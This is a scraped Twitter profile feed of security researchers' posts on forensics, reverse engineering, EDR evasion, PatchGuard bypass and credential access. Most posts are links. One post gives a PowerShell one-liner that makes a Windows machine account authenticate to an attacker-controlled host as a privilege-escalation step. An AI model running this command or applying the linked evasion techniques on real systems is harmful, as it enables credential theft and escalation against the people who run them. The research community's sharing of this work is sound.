Naacbin (@naacbin) 's Twitter Profile
Naacbin

@naacbin

Maldev, forensic and reverse makes me happy.

ID: 1048638572956450816

Website: https://naacbin.gitlab.io/
Joined: 06-10-2018 18:18:13

162 Tweets

175 Followers

177 Following

k1nd0ne (@k1nd0ne) 's Twitter Profile Photo

Time to make volatility 3 compatible with modern Windows hibernation file analysis. Blog post : forensicxlab.com/posts/hibernat… Feature : tinyurl.com/5n8u4nr9 Special thanks to Chad Tilbury who gave me the motivation and Joe Sylve 🐘 @[email protected], Vico Marziale, Golden G. Richard III for the incredible work

Naacbin (@naacbin) 's Twitter Profile Photo

I have made 2 writeups for #ECSC2023 and #DGhAck. For the 2nd one, I used github.com/naacbin/Covena… [1] Recovering PDF using DataRun of $LogFile > naacbin.gitlab.io/data-on-the-ru… [2] Decrypt empire C2 communication by extracting private key from memory > naacbin.gitlab.io/empire-c2/

Fox-IT (@foxit) 's Twitter Profile Photo

Read our latest blog to find out how our Security Research Team reverse-engineered Windows Defender to uncover previously undocumented artefacts, which can now be recovered using Dissect! blog.fox-it.com/2023/12/14/rev…

Charlie Bromberg « Shutdown » (@_nwodtuhs) 's Twitter Profile Photo

Exegol holiday release is live 🎄🎁🎅 New remote graphical desktop, image entrypoint, container startup script, new tools, improved pipeline, doc, etc. Many big things! github.com/ThePorgs/Exego… github.com/ThePorgs/Exego… gg to the team Dramelac QU35T 👏 and all contributors.

an0n (@an0n_r0) 's Twitter Profile Photo

OST cannot be stopped. Here is a technique we tested internally 9 months ago: blocking EDR telemetry by leveraging the Windows Filtering Platform. We considered it so evil that we didn't publish it at the time. It was pointless; now here it is by Chris Au: github.com/netero1010/EDR…

Mayfly (@m4yfly) 's Twitter Profile Photo

Did you know you don't need to use a potato exploit to go from an IIS AppPool account to admin or SYSTEM?

Simply use:
powershell iwr http://192.168.56.1 -UseDefaultCredentials
to get an HTTP coerce of the machine account.
👇🧵
Kévin - Mizu (@kevin_mizu) 's Twitter Profile Photo

Challenge time is now over ⏰
TL;DR
- HTML injection
- Axios DOM-based CSPP
- Axios CSPP response overwrite gadget
- jQuery DOM Clobbering + CSPP selector overwrite gadgets
- Setting src attr to "javascript:" for each HTML node ➝ XSS
Detailed writeup 👇 mizu.re/post/intigriti…

DebugPrivilege (@debugprivilege) 's Twitter Profile Photo

I did two write-ups about ETW. The first one covers how to capture an ETW trace and includes a case study using the WinInet provider to analyze Cobalt Strike. The second one covers how EDRs use the DotNetRuntime ETW provider.
1. github.com/DebugPrivilege…
2. github.com/DebugPrivilege…

Ange (@angealbertini) 's Twitter Profile Photo

I documented github.com/corkami/docs/b… and made 'low alignment PEs' (PoCs @ github.com/corkami/pocs/b…) around 2009, but I'm pretty sure this was known before. Any early case of an ITW low-align PE? cc Adam qkumba hasherezade ReWolf

Naacbin (@naacbin) 's Twitter Profile Photo

Over the past few months, I've contributed to the github.com/mandiant/VM-Pa… repository to incorporate forensic packages. As a result, I've developed scripts to automate VM installation for reverse, maldev and forensic purposes. 👇 github.com/naacbin/SecLab

Elliot (@elliotkillick) 's Twitter Profile Photo

I just spent the last few months of my life reverse engineering the Windows 10 parallel loader and figuring out how it does concurrency. Updates have now been published! github.com/ElliotKillick/…

Mayfly (@m4yfly) 's Twitter Profile Photo

New lab 🏰 for the GOAD project 🥳: SCCM. You can now test the SCCM/MECM attacks locally on VirtualBox or VMware. More information here: mayfly277.github.io/posts/SCCM-LAB… Repository here: github.com/Orange-Cyberde… Thx again Kenji Endo for your help in building this!

k1nd0ne (@k1nd0ne) 's Twitter Profile Photo

Exciting news: VolWeb 2.0 is out! This digital forensics memory analysis platform leverages the capabilities of the Volatility 3 framework. With significant enhancements, it now offers improved flexibility and scalability! github.com/k1nd0ne/VolWeb 1/8

Geebz (@gbps111) 's Twitter Profile Photo

I just published the long-awaited Part 2 to my PCIe blog post series - "All About Memory: MMIO, DMA, TLPs, and more!" This post also includes a companion experiment where I dive into what pcileech looks like over a PCIe protocol analyzer. Please enjoy! ctf.re/kernel/pcie/tu…

Ali Hadi | B!n@ry (@binaryz0ne) 's Twitter Profile Photo

Here is my #Friday #giveaways! Like, retweet and share with your network... I'll randomly choose on Monday 4/1 two winners to get the full "C5W Certified Malware Analysis" course and certification for FREE... You should not miss this! #DFIR #Malware academy.cyber5w.com/courses/C5W-Ce…

Evan McBroom (@mcbroom_evan) 's Twitter Profile Photo

I just published a blog and tool for the LSA Whisperer work that was presented at the SpecterOps Conference (SOCON) back in March. If you are interested in getting credentials from LSASS without accessing its memory, check it out! medium.com/specter-ops-po…

Nathan Blondel (@slowerzs) 's Twitter Profile Photo

I wrote a blogpost on injecting code into a PPL process on Windows 11, without abusing any vulnerable driver. blog.slowerzs.net/posts/pplsyste…

S3cur3Th1sSh1t (@shitsecure) 's Twitter Profile Photo

Didn't check the code yet, but it looks like SilverPotato and CertifiedDCOM have a working public weaponized tool by now: github.com/CICADA8-Resear… That's huge news from my perspective 🔥

Can Bölük (@_can1357) 's Twitter Profile Photo

Excited to share my latest article: PgC - a novel approach to disable Patchguard during runtime using basic memory management principles. It has worked against every version of Patchguard for the last 7 years, without needing any updates! blog.can.ac/2024/06/28/pgc…

5pider (@c5pider) 's Twitter Profile Photo

I haven't posted anything about Havoc in a while so imma share something I have been working on. Wrote a custom VM/Interpreter (based on the RISC-V instruction set) to execute exploits and other arbitrary code. The client is now fully extendable and scriptable via the Python API
